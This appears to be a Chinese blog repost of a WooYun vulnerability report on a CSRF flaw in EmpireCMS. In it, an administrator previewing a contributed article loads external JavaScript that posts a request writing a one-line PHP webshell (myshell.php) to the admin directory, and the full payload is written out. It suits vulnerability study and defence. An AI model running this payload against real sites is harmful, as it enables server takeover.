帝国php漏洞,EmpireCMS(帝国cms)csrf getshell

最新推荐文章于 2024-06-30 18:24:35 发布
最新推荐文章于 2024-06-30 18:24:35 发布
阅读量531 收藏 1
点赞数
文章标签: 帝国php漏洞

漏洞作者: ../

帝国cms默认添加栏目时候默认是允许投稿。

另外帝国的会员中心基本都是开启的,有的就算不开启也是可以匿名投稿。

漏洞证明:

d7f01b0295b7ebcb888f30e2c3e59464.png

图1所示,帝国添加栏目时候默认是开启投稿的。

610ec63adfb53d228755977491b3c6be.png

图2所示,虽然过滤的

也就是http://127.0.0.1/1.js,1.js代码看这里 WooYun: 帝国CMS CSRF GetShell

041923060fea177d5a4dad9119f63599508b8213.jpg

图3所示:管理员看到未审核内容时候点击标题可以查看内容。

041926058a4deb8cae3a5c6ac887f1469811f13d.jpg

图4所示:管理员查看预览稿件时候调用外部1.js,post /e/admin/ecmscom.phpenews=AddUserpage&id=&oldpath=page.html&cid=&gid=1&pagemod=1&title=aaa&path=page.html&classid=0&pagetitle=&pagekeywords=&pagedescription=&pagetext=%3C%3Fphp+file_put_contents%28%27myshell.php%27%2C%27%3C%3Fphp+%24_GET%5Bc%5D%28%24_POST%5Bx%5D%29%3B%3F%3E%27%29%3B%3F%3E&Submit=%E6%8F%90%E4%BA%A4

在/e/admin/目录生成myshell.php一句话。

04192842935ae649d0d8d742b4c356105037457a.jpg

BillMarshall
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
EmpireCMS4.5 渗透测试及靶场搭建(漏洞复现)
Continuejww的博客
08-30 2185
成功在网站根目录写入webshell连接蚁剑目录遍历图片内的栏目信息全部都含有如上图的xss漏洞
EmpireCMS短信插件_帝国CMS系统短信设置
10-20
第一步:将短信插件解压至根目录覆盖,浏览器输入:域名/install_smshuyi.php安装短信插件,出现安装成功提示后请将根目录下的install_smshuyi.php删除 第二步:进入系统后台->插件->手机短信管理->短信账户设置
帝国CMS(EmpireCMS漏洞复现
RMC131的博客
06-30 702
帝国网站管理系统》英文译为Empire CMS,简称Ecms,它是基于B/S结构,且功能强大而帝国CMS-logo易用的网站管理系统。帝国CMS官网:http://www.phome.net/参考相关漏洞分析文章,加上更详细的渗透测试过程。
Web安全 | EmpireCMS漏洞常见漏洞分析及复现
Javachichi的博客
03-05 1995
本文将对EmpireCMS(帝国cms)的漏洞进行分析及复现。
网站安全渗透测试 对帝国CMS代码的后台功能性安全测试
网站安全专家
09-09 581
最近我们SINE安全在对帝国CMS系统进行代码安全审计的时候,发现该系统存在网站漏洞,受影响的版本是EmpireCMS V7.5,从帝国官方网站下载到本地,我们人工对其代码进行详细的漏洞检测与安全代码分析。共计发现三个高危漏洞,都是在网站的后台管理页面上的功能发现的。该漏洞的产生,最根源的问题是没有对get,post提交方式进行严格的安全效验与过滤,导致可以插入恶意代码到后端服务器中去处理,导致漏...
网站安全检测 对帝国CMS代码的后台功能性安全测试
网站安全资讯
09-09 618
撸了今年阿里、头条和美团的面试,我有一个重要发现.......>>> ...
常见的RCE漏洞复现(CVE-2017-18349)
zkaqlaoniao的博客
11-14 201
声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。再新建一个文件,使用include来引用图片马的内容。上传成功,会在下面显示临时文件储存的地址。集齐这两个文件可以召唤一个文件上传漏洞。上传完包含问价,直接访问,进行传参即可。同时在该目录也会有一个1.php文件。访问上传的文件,上传一句话木马。把咱们写的文件上传代码上传。任意位置恶意exp代码。去php.ini中修改。
帝国cms管理员密码重置插件
03-15
帝国内容管理系统(EmpireCMS)是一款开源的PHP+MySQL建站系统,广泛应用于各类企业网站、新闻资讯平台以及个人博客等。它提供了强大的内容管理、模板制作和二次开发功能,使得非专业程序员也能便捷地进行网站建设和...
帝国CMS清理动态缓存插件
04-26
帝国CMS清理动态缓存插件】是一款专为帝国CMS内容管理系统设计的辅助工具,旨在优化网站性能,提高用户体验。在动态网站中,缓存技术是必不可少的,它能够存储频繁访问的数据,减少数据库的负担,加快页面加载速度...
帝国CMS中robots.txt文件用法
09-29
帝国CMS中,`robots.txt`文件是一个至关重要的元素,它用于指导搜索引擎爬虫如何抓取网站的内容。本文将详细探讨`robots.txt`文件的原理、作用以及在帝国CMS中的具体应用。 **robots协议的原理** `robots协议`,...
帝国CMS通用发布插件
07-18
**帝国CMS通用发布插件**是一款专为**帝国CMS**设计的高效、便捷且安全的发布工具。这款插件的独特之处在于它允许用户在不登录网站后台的情况下进行内容发布,从而消除了在第三方采集器(如火车头、简数等)中输入...
基于Hog和SVM的行人检测python源码+文档说明
08-05
<项目介绍> 这是采用Hog和SVM的行人检测。 步骤 1,运行crop_image 剪裁负样本的图片 2,运行detection.cpp 进行HOG的提取和SVM的训练 3,运行find_save_hardexample训练hardneg 4,运行detection.cpp 生成最终的SVM模型 5,如果需要检测生成模型的xml,可以运训test_mai - 不懂运行,下载完可以私聊问,可远程教学 该资源内项目源码是个人的毕设,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。 --------
最新直播系统带商城源码 附搭建教程(价值2w多)
08-05
最新直播系统带商城源码 附搭建教程 功能介绍: 礼物系统:普通礼物、豪华礼物、热门礼物、守护礼物、幸运礼物 提现方式:统一平台提现日期及方式,方便用户执行充值提现操作 连麦送礼PK:主播之间可进行互动连麦送礼PK,PK结束有相应的奖惩 直播间红包:平台主播及用户都可发红包,有多种红包类型及红包提醒 主播守护:可进行平台充值,守护心仪的主播,主播守护时长有多种设置 小视频拍摄:单独的小视频模块,包含视频列表,视频拍摄、编辑、上传、互动等 引导图功能:优化更新系统引导图,后台可上传图片或视频内容,视频内容可跳过 动态:点击动态可进入动态详情页,包含话题的动态点击话题可进入该话题动态列表,可查看该话题下所有动态信息,用户可对动态进行点赞、评论、举报等操作 商城:可通过商品名称搜索商品,搜索后可根据销量价格等进行筛选 商品详情:查看商品的名称价格销量评价等信息,可进入店铺,可与客服沟通,可直接购买 直播观看送礼提示:用户赠送礼物后,直播间公屏聊天处有送礼提示 直播购物车:观众在直播间中可查看主播直播购物车中的商品,点击某个商品跳转到商品介绍页面,商品介绍上有购买按钮,
[毕业设计]Java轻量级即时通讯客户端设计与开发(源代码+论文).zip
08-05
[毕业设计]Java轻量级即时通讯客户端设计与开发(源代码+论文)
预算申购单-账簿凭证-采购管理.xlsx
08-05
销售管理表,财务报表,占比分析,消费能力分析,日程安排,提成表,考核表 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
LSPosed-v1.9.3_mod-7244-zygisk-release.zip
最新发布
08-05
LSPosed-v1.9.3_mod-7244-zygisk-release.zip
销售员业绩销售分析看板.xlsx.xlsx
08-05
销售管理表,财务报表,占比分析,消费能力分析,日程安排,提成表,考核表 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
EmpireCMS网站管理系统新手入门教程
这篇教程是针对《帝国网站管理系统》的新手用户,尤其是那些对EmpireCMS没有基础但希望通过它建立网站的用户。教程假设用户具备基本的Dreamweaver使用技能,能够设计简单的表格式模板。教程中提到的网站采用多种技术...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值